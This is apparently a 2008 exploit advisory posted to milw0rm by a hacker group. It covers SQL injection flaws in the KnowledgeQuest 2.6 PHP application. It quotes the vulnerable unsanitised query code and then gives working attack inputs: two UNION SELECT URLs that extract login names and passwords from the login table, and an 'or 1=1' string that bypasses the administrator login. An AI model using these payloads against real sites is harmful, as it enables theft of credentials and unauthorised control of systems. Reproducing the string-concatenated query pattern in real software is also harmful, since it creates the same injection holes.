######################################################################## # # # ...:::::KnowledgeQuest 2.6 SQL Injection Vulnerabilities ::::.... # ######################################################################## Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) ------- vuln code in articletext.php: line 13: $kqid = $HTTP_GET_VARS["kqid"]; ...... line 17: $result = mysql_query("select DATE_FORMAT(postdate,'%m-%d-%y') as postdate, DATE_FORMAT(reveiwdate,'%m-%d-%y') as reveiwdate, categoryid,title,text, attach, kqid, authorid from knowledgebase where kqid=" .$kqid.mysql_error()); ########### vuln code in articletextonly.php: line 13: $kqid = $HTTP_GET_VARS["kqid"]; ...... line 17:$result = mysql_query("select * from knowledgebase where kqid=" .$kqid.mysql_error()); -------- Exploits: http://www.site.com/[patch]/articletextonly.php?kqid=-9999/**/union/**/select/**/1,2,3,loginid,password,6,7,8,9,10,11/**/from/**/login/* http://www.site.com/[patch]/articletext.php?kqid=-999/**/union/**/select/**/1,2,3,loginid,password,6,7,8/**/from/**/login/* -------------------------------- .::::admin Authentication bypass vuln::::. vuln code in logincheck.php: if(!empty($_POST['username'])) { $username = $_POST['username']; } if(!empty($_POST['password'])) { $password = $_POST['password']; } ... ... ... $sql = "select * from login where loginid='". $username ."' and password='". $password . "'"; ----- Exploit: User Name:admin ' or 1=1/* Password :[whatever] //you must login in administratorlogin.php ;) -------------- young iranian h4ck3rz # milw0rm.com [2008-04-09]